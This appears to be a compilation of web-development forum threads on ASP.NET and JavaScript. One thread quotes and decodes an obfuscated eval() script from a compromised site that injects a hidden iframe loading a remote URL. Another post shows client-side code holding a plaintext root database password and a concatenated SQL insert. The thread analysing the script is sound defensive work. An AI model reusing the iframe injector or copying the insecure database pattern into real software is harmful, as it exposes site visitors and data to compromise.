vmd1234 wrote: x = (window.Event) ? e.pageX : event.clientX;
y = (window.Event) ? e.pageY : event.clientY;
should be window.event - note the lower-case E.
Note that for non-IE browsers (event passed to handler, no window.event ) this will retrieve the coordinates relative to the document, while in IE they will be relative to the window. These will tend to differ, especially if the document scrolls.
vmd1234 wrote: var calendarDiv = document.getElementById("calendarDiv");
calendarDiv.style.top= y;
calendarDiv.style.left= x;
This is only going to work if calendarDiv is position ed relative , absolute , or fixed ... and each of those styles will cause the coordinates to be interpreted differently. fixed will result in the element being positioned relative to the window - which is perfect for IE (except that it doesn't work in IE6). absolute will result in the element being positioned relative to the page (or parent element positioned relative ly) - which will work nicely for non-IE browsers. And relative will result in the element being positioned relative to where it would normally appear in the document (this won't work at all for your purposes).

Dear all,
I develop a website in asp.net with c#. And also, I develop a toolbar in the toolbar studio separately like Yahoo, google toolbars.
Aim of the Website:
Enabling the visitors to become a member of our webiste
by downloading the toolbar from our website.
After the member downloads the toolbar, The toolbar is added to the intenet explorer browser. The member can get the facilities such as searching, weatheronline, internet radio,etc., The toolbar includes a home button. When the user clicks the home button, the page will be redirected to ourwebsite.
Member benefits will be displayed in our website. Therefore, the toolbar is added to browser separately like yahoo, google toolbar.
My Request is,
Toolbarstudio provides the unique toolbar id for each user(member).I save the unique toolbar id in the mysql database. For saving thetoolbar id, we use the client side javascript by using the following connection string
var adoConn = new ActiveXObject("ADODB.Connection");
//var adoRS = new ActiveXObject("ADODB.Recordset");
adoConn.Open("Driver={MySQL ODBC 5.1 Driver};Server=VBNET4;Port=3306; Database=netmusk; User=root; Password=harsha;Option=3; Min Pool Size=5; Max Pool Size=60; Connect Timeout=2;");
adoConn.Execute("insert into tb_savetoolid values('" + tool.toolbarid + ")");
adoConn.Close();
//adoRS.Close();
I can save the toolbar-id via toolbar to mysql database from the remotesystem if the remote system is installed with odbc driver.
My problem is,
I need to save the toolbar-id via toolbar to mysql without installing any odbc driver in the remote system.
I believe that you have got my problem and please give me a solution.
Awaiting for your detailed answer,
Thanks in Advance,
J. Mohan.

Then you should probably be using a RequiredFieldValidator[^]
cmpemikail wrote: Only textboxes values are clearing, the other parts is not clearing when the page is refreshing
Not "clearing" because

The point of the UpdatePanel is to only update part of the page, not the entire page.

document.form1.submit();
instead of form1 use your form name.
If you need submission after selection of specific value then you will require to implement some conditions.

Greetings,
I'am currently working with a Context menu in a ASP.net page.
I'am having the Context menu working and the context menu pops'up as requested.
But now I'have to catch the linked button in the Context menu to proces this further;
I have the Java code for this :
onkeypress="<% = ContextMenu1.GetEscReference() %>"
onclick="<% = ContextMenu1.GetOnClickReference() %>"
How can I convert these event handlers in Java to c#???
These must be included inside the Page_Load method
The example for the Context menu was written in Java Code but my web application is written in c#.
I already found some kind of solution but these gives index errors?
ContextMenu1.Attributes["onkeypress"] = ContextMenu1.GetEscReference();
ContextMenu1.Attributes["onclick"] = ContextMenu1.GetOnClickReference();
And as far as I can see these are not eventhandlers.
Maybe it can help in the solution?
Thanks for all help

Java and javascript are two different things. Totally.
We have an ASP.NET forum.

have you tried the compiler

What are you on about? Despite the OP using the term Java, it's obvious that he's talking about JavaScript - there is no JavaScript compiler.

I need to create a function that allows the user to log out from the site and redirect him to the default home page. How can i create a java script function to sign out from a page? How can i log out from a page using java script? Thanks for your help

Depends on how you login, do you use session state on the server or just cookies.
If you just use cookies, you can delete them as shown in this article.[^]

To redirect using javascript use this code
window.location('index.html');

We've had a user access a site that has been compromised. The compromised site leads to a .js that appears to spawn an iframe. My JavaScript ability is amateur at best, and the code makes no sense to me. It seems simple, but I'm baffled by it, please help me identify what it does.

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8 (b.e==\'i-2\'){}4{3.g("<9 d=7:\/\/h.c.2\/a.6 f=1 5=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))

This was pulled from "www[.]ririwow[.]cn".
|
|
|
|
|
The bulk of it is a decompressor / decryptor. The arguments passed to it (('8 (b.e==\'i-2\'){}4{3.g("<9 d=7:\/\/h.c.2\/a.6 f=1 5=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}) ) result in the following code (which is then passed to eval() to be executed):
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("");}
...which results in an invisible iframe loading up the given URL (unless the user's language is Simplified Chinese, in which case it does nothing at all).
I don't know what's at the end of that URL, and don't much feel like finding out right now.

With which technology you would like to implement AJAX. Like you want to use it with asp,asp.net or simply with html??
By the way there are very good articles available on codeproject itself which will provide you a lot of information about AJAX.

|
|

I rather like this one[^]. It's not AJAX-specific, but frankly raw AJAX is dead simple (and... slightly tedious) - this'll introduce you to a nice little library for working with it.

If I load a web user control in an assembly from different assembly, the controls in the user controls dont get intialized. I need to explicitily intialize them.
For instance, I create a user control(TestControl ) in assembly(AssemblyName) with label in it. And I use it in different assembly as below

<uc1:testcontrol id="Test" runat="server">
The label in the user control in the referred assembly always remains NULL. I need to add it at runtime in the control. Do i need to take care of anything else or am I missing anything.
Any help would be appreciated.
Thanks in advance.

Cross site scripting prevention?
Does the link exist on the same host as the parent page?

Parent page is client side,url in iframe is in server side, The url execute a javascript too.
|
|
|
|
|
so, the parent page is a file of disk? and the IFRAME is a file from a webserve?
That is most likely cross site scripting security in the browser stopping you doing that
Can you request the parent page from the same webserver?
